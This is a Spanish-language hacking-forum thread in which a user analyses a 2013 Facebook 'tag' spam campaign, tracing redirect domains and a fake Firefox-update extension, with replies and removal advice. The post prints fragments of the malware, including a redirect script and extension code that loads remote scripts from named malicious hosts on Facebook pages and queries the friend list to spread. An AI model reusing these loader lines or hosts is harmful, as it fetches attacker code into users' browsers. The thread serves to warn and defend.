Malware se propaga mediante "etiquetas" en Facebook

  • 8 Respuestas
  • 6973 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
  • Skype: code.punisher
    • Ver Perfil
    • Root Security
    • Email

Malware se propaga mediante "etiquetas" en Facebook

  • en: Marzo 14, 2013, 06:17:53 am

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa… que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h  WDF…!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

Código: (php) [Seleccionar]
var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de “Debido a los errores del sistema y vulnerabilidades de seguridad” jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

https://www.virustotal.com/es/file/8c3f282af8c718b69bcd142adfed63fc1dfde3b08a3677972dd08bf2a787604f/analysis/

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

Código: (javascript) [Seleccionar]
if(location.hostname.indexOf("facebook.com") >= 0){

addJavascript('http://sosyalpaket.net/yeni.php');

addJavascript('http://fbmedyahizmetleri.com/bakgel.php');

addJavascript('http://facebookhizmetlerim.com/user.php');

}

En el user.php me tope con:
Código: (php) [Seleccionar]
"https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos
« Última modificación: Diciembre 08, 2014, 03:10:55 pm por Expermicid »

Desconectado M1CR0B110

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Buena  info

Desconectado F0M3T

  • *
  • Ex-Staff
  • *****
  • Mensajes: 186
  • Actividad:
    46.67%
  • Country: mx
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
Buenísimo aporte, y gran descubrimiento, gracias por aportarlo, ahora nadamás nos queda darlo a conocer para que todos se cuiden.
Saludos.
Tener éxito no es aleatorio, es una variable dependiente del esfuerzo.

Desconectado CodePunisher

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 0
  • Skype: code.punisher
    • Ver Perfil
    • Root Security
    • Email
En el navegador de Gogle Chrome el malware se encuentra en : C:\Users\"Uusario"\AppData\Local\Google\Chrome\User Data\Default\Extensions (en Windows 7)
Pues si lo eliminan directamente del navegador no se podra pues tiene redireciones al entrar a chrome://extensions/  al WebStore..!! Asique es mejor eliminarlo manualmente.

Lo interezante del complementoen Google  chrome posee una especie de "bypass" que hace al que se instale como si fuera del un complemento del WebStore (testeado en WinXp) pues no necesita la dichosa "--enable-easy-off-store-extension-install". algo que muy interesante.

Saludos...
atte.: CodePunisher


Desconectado mhz

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Muy interesante el post . podrias subir la muestra del malware a algun lado ? me interesaria hacerle un research en especial a ese supuesto "bypass" de chrome saludos :)

Desconectado peruvianrulez

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
  • Skype: peruvianrulez
    • Ver Perfil
    • Email
muy buena explicacion sobre todo con las imagenes que dejan ver lo necesario ... pero bueno si tiene alguien tutorial sobre esto y de likejacking seriabueno q lo incluyan aca

Desconectado EvilSoft

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
excelente informacion ...... codepunisher

Desconectado bruxinho

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
  • Skype: bruxinho_dark
    • Ver Perfil
    • Email
interessante informacion rs

Desconectado elshotta

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
mmm muy bueno pero los codigos php de donde los sacaste?
o los adivinaste
saludos